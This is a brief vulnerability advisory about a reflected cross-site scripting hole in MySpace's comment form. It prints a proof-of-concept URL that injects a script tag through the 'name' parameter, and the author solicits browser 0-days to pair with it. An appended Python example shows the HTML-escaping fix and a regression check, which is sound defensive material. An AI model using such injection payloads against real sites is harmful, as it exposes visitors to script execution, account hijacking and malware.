Myspace.com is vulnerable to XSS in the add comment function. Exploitation provided.
MySpace.com - XSS hole
----------------------
Desc: There's an XSS hole in MySpace.com
Risk: Medium to High (can be used to include malicious code)
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk
Site blurb : Myspace.com is another one of those crappy community sites for
cam whores/scene kids/emo kids/goths/generic fools. If you haven't heard of
it then you must have been hiding under a rock for the past few years.
Hole description : The hole is in the add comment function. For this to work you
must be logged in and have a valid friendID.
Screenshot : http://0xdeadface.co.uk/myspace_xss.JPG
URL : http://www.myspace.com/index.cfm?fuseaction=user
&circuitaction=viewProfile_commentForm&friendID=[7-char-friend-id]
&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E
I have been able to confirm that this can be used for the inclusion of code (got any 0day IE exploits?)
Hugs & Kisses dyn0/codeslag
"When it came to throw brick through that starbucks window you left me all alone." - Against Me
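
The fix for this class of hole is to HTML-encode the `name` parameter before it is written back into the comment form. The sketch below is an added example, not code from the advisory or from MySpace: it is written in Python rather than the site's ColdFusion, and the template string and the assumption that `name` lands in an HTML text context are hypothetical. It renders the advisory's URL with and without output encoding and includes a regression check.

```python
import html
from urllib.parse import urlsplit, parse_qs

# URL from the advisory, with the friendID placeholder left as published.
ADVISORY_URL = (
    "http://www.myspace.com/index.cfm?fuseaction=user"
    "&circuitaction=viewProfile_commentForm&friendID=[7-char-friend-id]"
    "&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E"
)

# Hypothetical template: the real page markup is not shown in the advisory.
TEMPLATE = "<h2>Leave a comment for {name}</h2>"


def get_name(url):
    """Return the URL-decoded `name` query parameter ('' if absent)."""
    # separator="&" keeps the literal ';' inside the value from splitting it.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True, separator="&")
    return query.get("name", [""])[0]


def render_unsafe(url):
    """Reflect the parameter verbatim: the behaviour the advisory reports."""
    return TEMPLATE.format(name=get_name(url))


def render_escaped(url):
    """Encode the parameter for an HTML text context before reflecting it."""
    return TEMPLATE.format(name=html.escape(get_name(url), quote=True))


def reflects_markup(rendered):
    """Regression check: True if a live <script> tag reached the page."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for render in (render_unsafe, render_escaped):
        page = render(ADVISORY_URL)
        print(f"{render.__name__}: live script tag={reflects_markup(page)}")
        print("  " + page)
```
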